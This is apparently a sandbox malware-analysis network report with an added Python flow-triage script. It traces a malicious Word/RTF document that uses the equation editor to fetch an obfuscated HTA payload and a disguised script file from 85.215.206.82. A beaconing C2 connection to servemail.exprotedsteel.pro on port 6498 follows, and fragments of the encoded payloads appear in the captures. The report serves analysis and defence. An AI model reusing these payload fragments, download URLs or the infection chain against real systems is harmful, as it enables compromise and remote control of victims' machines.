                                                                                                                                                                        Oct 23, 2024 17:27:26.066643000 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.075218916 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.075251102 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.075263023 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.075340986 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.091994047 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.092022896 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.092031956 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.092164993 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.434159040 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.439632893 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.439729929 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.439754963 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.439810991 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.445282936 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.445317984 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.445348024 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.445359945 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.445359945 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.445383072 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.445394039 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.445394039 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.445427895 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.450905085 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.450936079 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.450968981 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.450989962 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451025963 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451034069 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451052904 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451083899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451133013 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451463938 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.456517935 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.456840038 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.457182884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.457348108 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:51.487747908 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:51.491252899 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:51.496711016 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:07.350433111 CEST4916780192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:28:21.946723938 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:21.977143049 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:28:21.983095884 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:38.434398890 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:38.727693081 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:39.429660082 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:40.630825996 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:43.033202887 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:47.838016033 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:52.314034939 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:52.518090963 CEST491746498192.168.2.2245.90.89.98
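The TCP table above is more useful once it is read per flow rather than per packet: the analysis VM holds one long-lived connection to 45.90.89.98 on the non-standard port 6498 on which it sends a packet roughly every 30 seconds, while the packets to 178.237.33.50:80 are spaced at doubling intervals, which is what unanswered SYN retransmissions look like. The script below is an added example and is not part of the Joe Sandbox report or its tooling. It parses rows in the Timestamp | Source Port | Dest Port | Source IP | Dest IP layout, groups the packets the VM originated into flows and labels each flow's timing. The embedded rows are a subset copied from the table above; the analysis-host address, the list of "common" ports and the tolerance thresholds are assumptions chosen for this report.

```python
"""Flow-level triage of a sandbox TCP packet table (added example).

Not part of the Joe Sandbox report.  Groups the packets sent by the analysis
VM into flows and classifies the spacing of each flow's packets: evenly
spaced packets on an unusual port look like a C2 keepalive, while gaps that
roughly double are TCP SYN retransmissions to a host that never answered.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import mean

ANALYSIS_HOST = "192.168.2.22"   # assumption: the sandbox VM in this report
COMMON_PORTS = {80, 443}         # assumption: anything else is worth a look

# Subset of rows copied from the report's TCP table (VM-originated packets only).
SAMPLE_ROWS = """\
Oct 23, 2024 17:27:51.491252899 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:28:21.977143049 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:28:52.518090963 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:28:07.350433111 CEST | 49167 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:28:38.434398890 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:28:38.727693081 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:28:39.429660082 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:28:40.630825996 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:28:43.033202887 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:28:47.838016033 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
"""


@dataclass(frozen=True)
class Packet:
    ts: datetime
    sport: int
    dport: int
    src: str
    dst: str


def parse_timestamp(text):
    """'Oct 23, 2024 17:27:51.491252899 CEST' -> naive datetime.

    The report prints nanoseconds but datetime only carries microseconds, so
    the fraction is truncated to six digits.  The zone suffix is dropped
    because every row of one report uses the same zone.
    """
    stamp, _zone = text.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text):
    """Parse pipe-separated table rows into Packet records."""
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, src, dst = (f.strip() for f in line.split("|"))
        packets.append(Packet(parse_timestamp(ts), int(sport), int(dport), src, dst))
    return packets


def gaps_seconds(timestamps):
    """Inter-packet gaps in seconds, in time order."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def classify_gaps(gaps):
    """Label a flow by the shape of its inter-packet gaps."""
    if len(gaps) < 2:
        return "single"
    avg = mean(gaps)
    if max(abs(g - avg) for g in gaps) < 0.1 * avg:
        return "periodic"       # steady interval: keepalive / beacon
    ratios = [b / a for a, b in zip(gaps, gaps[1:])]
    if all(1.5 <= r <= 2.5 for r in ratios):
        return "retransmit"     # doubling gaps: SYN backoff, nobody answered
    return "irregular"


def triage(packets, host=ANALYSIS_HOST):
    """Return {(dst, dport, sport): (label, packet_count, mean_gap)} for host-originated flows."""
    flows = defaultdict(list)
    for p in packets:
        if p.src == host:
            flows[(p.dst, p.dport, p.sport)].append(p.ts)
    result = {}
    for key, times in flows.items():
        gaps = gaps_seconds(times)
        result[key] = (classify_gaps(gaps), len(times), mean(gaps) if gaps else 0.0)
    return result


def report(packets, host=ANALYSIS_HOST):
    """One human-readable line per flow, flagging non-standard destination ports."""
    lines = []
    for (dst, dport, sport), (label, n, avg) in sorted(triage(packets, host).items()):
        note = "" if dport in COMMON_PORTS else "  <-- non-standard port"
        lines.append(f"{dst}:{dport} (from {sport}): {label}, {n} pkts, mean gap {avg:.2f}s{note}")
    return lines


if __name__ == "__main__":
    for line in report(parse_rows(SAMPLE_ROWS)):
        print(line)
```

On the rows above this reports the 45.90.89.98:6498 flow as periodic with a mean gap of about 30.5 s on a non-standard port, the 178.237.33.50:80 flow as retransmit, and the lone packet to 85.215.206.82 as single. The thresholds (10 % jitter for "periodic", gap ratios between 1.5 and 2.5 for "retransmit") are deliberately loose so that a short capture like this one still classifies; on a long pcap you would tighten them and run the same logic over every host-originated flow.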
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 17:26:12.920614004 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:12.928484917 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:14.945308924 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:14.952754974 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:14.954586983 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:14.962188005 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:19.154068947 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:19.162659883 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:19.164298058 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:19.177689075 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:20.364048958 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:20.372270107 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:20.373694897 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:20.381628990 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:52.038976908 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:52.057538986 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:26:53.678733110 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:26:53.687494993 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:27:20.647644997 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:27:20.660988092 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Oct 23, 2024 17:27:22.295727015 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Oct 23, 2024 17:27:22.307118893 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 17:26:12.920614004 CEST | 192.168.2.22 | 8.8.8.8 | 0x42e6 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:14.945308924 CEST | 192.168.2.22 | 8.8.8.8 | 0x71f3 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:14.954586983 CEST | 192.168.2.22 | 8.8.8.8 | 0x9a7e | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:19.154068947 CEST | 192.168.2.22 | 8.8.8.8 | 0xc083 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:19.164298058 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:20.364048958 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:20.373694897 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:52.038976908 CEST | 192.168.2.22 | 8.8.8.8 | 0x65b5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:53.678733110 CEST | 192.168.2.22 | 8.8.8.8 | 0xd565 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:27:20.647644997 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c90 | Standard query (0) | servemail.exprotedsteel.pro | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:27:22.295727015 CEST | 192.168.2.22 | 8.8.8.8 | 0xe0f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 17:26:12.928484917 CEST | 8.8.8.8 | 192.168.2.22 | 0x42e6 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:14.952754974 CEST | 8.8.8.8 | 192.168.2.22 | 0x71f3 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:14.962188005 CEST | 8.8.8.8 | 192.168.2.22 | 0x9a7e | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:19.162659883 CEST | 8.8.8.8 | 192.168.2.22 | 0xc083 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:19.177689075 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:20.372270107 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:20.381628990 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:52.057538986 CEST | 8.8.8.8 | 192.168.2.22 | 0x65b5 | No error (0) | drive.google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:26:53.687494993 CEST | 8.8.8.8 | 192.168.2.22 | 0xd565 | No error (0) | drive.usercontent.google.com | | 216.58.212.129 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:27:20.660988092 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c90 | No error (0) | servemail.exprotedsteel.pro | | 45.90.89.98 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:27:22.307118893 CEST | 8.8.8.8 | 192.168.2.22 | 0xe0f | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• u4u.kids
• drive.google.com
• drive.usercontent.google.com
• 85.215.206.82
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49167 | 85.215.206.82 | 80 | 3492 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:26:23.232127905 CEST | 522 | OUT | GET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 85.215.206.82
Connection: Keep-Alive
Oct 23, 2024 17:26:24.121449947 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:26:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 23 Oct 2024 07:55:25 GMT
ETag: "1578e-62520356584d3"
Accept-Ranges: bytes
Content-Length: 87950
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
                                                                                                                                                                        Data Ascii: {\rtf1{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}{\5265154797?/86&631~=3??1##&+?.@5:~_#,3;[9$69,?9%'#?/%1?3<?!7!?:9-3*622~5=''8?4]8?=)4;8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=1|`3]~?6#(*&?##?+_,||>@6)7[@?3/[9|?@(?#]^(!%3&)&%73%6`%$^[?&?;?*^<1[8][0[?$|0?/48%3~'/36??(8`*?.6?<@@2/-/=%|5*|%;,]:19!$%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~]4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0^?-&?$+<1#//+-?,6*[(16<.`613)%>?@%?|2`6;<%&/2_#=>=@2-8~.?+4;-%#6%^9,^~_!?1803%'4#(%2?!%%/*6'!]`((1;+?.``?._))0?,<53=@@9.9?-^,|&@~:^@'|^&%|'%?``-^&?6/+)</6,]/?,#!:8!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_`!'&3;..:2-$&,'0@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-|`/?#-^~^?&?;)?<0]]/8,|?*%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)/7+?5-`.!:~'(@-~&:>*^1?/0@+.^5'?<93[,'(7<7<&:&&%?5>'$'>98'$'3'/>:&80~`%@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#2!?&)[+$??*0%>13?~_2`(:7~==*?
Oct 23, 2024 17:26:26.261456013 CEST | 311 | OUT | HEAD /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 85.215.206.82
Content-Length: 0
Connection: Keep-Alive
Oct 23, 2024 17:26:26.526844025 CEST | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:26:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 23 Oct 2024 07:55:25 GMT
ETag: "1578e-62520356584d3"
Accept-Ranges: bytes
Content-Length: 87950
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 85.215.206.82 | 80 | 3964 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:26:31.505708933 CEST | 361 | OUT | GET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 85.215.206.82
Connection: Keep-Alive
Oct 23, 2024 17:26:32.377068043 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:26:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 23 Oct 2024 07:37:15 GMT
ETag: "20a38-6251ff46a1a58"
Accept-Ranges: bytes
Content-Length: 133688
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
                                                                                                                                                                        Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Oct 23, 2024 17:26:32.377193928 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                        Oct 23, 2024 17:26:32.377206087 CEST212INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                                                                                        Oct 23, 2024 17:26:32.377219915 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                        Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Oct 23, 2024 17:26:32.377232075 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                        Oct 23, 2024 17:26:32.377393007 CEST424INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252
                                                                                                                                                                        Oct 23, 2024 17:26:32.382630110 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%


Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49170 | Destination IP: 85.215.206.82 | Destination Port: 80 | PID: 3180 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:26:44.717466116 CEST | 356 | OUT | GET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 85.215.206.82
Connection: Keep-Alive
Oct 23, 2024 17:26:45.588454962 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:26:45 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 23 Oct 2024 07:25:42 GMT
ETag: "22576-6251fcb2802ee"
Accept-Ranges: bytes
Content-Length: 140662
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Ascii: private function CreateSession(wsman, conStr, optDic, avinagrar) dim carnistaFlags dim conOpt dim carnista dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword carnistaFlags = 0 proxyAccessType
Oct 23, 2024 17:26:45.588469982 CEST | 1236 | IN | Data Ascii: = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 prox
Oct 23, 2024 17:26:45.588481903 CEST | 424 | IN | Data Ascii: = "utf-8" then carnistaFlags = carnistaFlags OR wsman.SessionFlagUTF8 else ' Invalid!
Oct 23, 2024 17:26:45.588493109 CEST | 1236 | IN | Data Ascii: end if if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOT
Oct 23, 2024 17:26:45.588505030 CEST | 1236 | IN | Data Ascii: SessionFlagUseSsl end if if optDic.ArgumentExists(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH)
Oct 23, 2024 17:26:45.588535070 CEST | 424 | IN | Data Ascii: t optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is only valid for '-auth:none'"
Oct 23, 2024 17:26:45.588552952 CEST | 1236 | IN | Data Ascii: OOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'"
Oct 23, 2024 17:26:45.588566065 CEST | 1236 | IN | Data Ascii: ot optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'"
Oct 23, 2024 17:26:45.588577986 CEST | 1236 | IN | Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-au
Oct 23, 2024 17:26:45.588589907 CEST | 1236 | IN | Data Ascii: th:certificate'" ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' op
